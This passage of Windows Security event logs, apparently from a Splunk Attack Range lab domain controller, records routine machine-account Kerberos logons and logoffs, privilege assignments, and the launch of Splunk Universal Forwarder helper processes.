Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264862
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x87F997
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53763
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:41:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264861
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x87F997
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:41:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264863
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x87F997
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:41:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264866
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x880796
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:41:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264865
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x880796
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53772
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:41:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264864
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x880796
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:42:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264867
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x163c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:42:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264869
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:42:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264868
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x290
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:42:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264870
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:42:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264871
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:42:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264873
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1914
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:42:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264872
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x195c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264879
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8837C4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264878
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8837C4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53781
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264877
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8837C4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264876
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88373E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264875
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x88373E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53780
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264874
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88373E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:42:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264882
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x884304
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:42:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264881
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x884304
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53788
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:42:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264880
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x884304
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:43:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264883
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x560
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264885
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1300
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264884
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
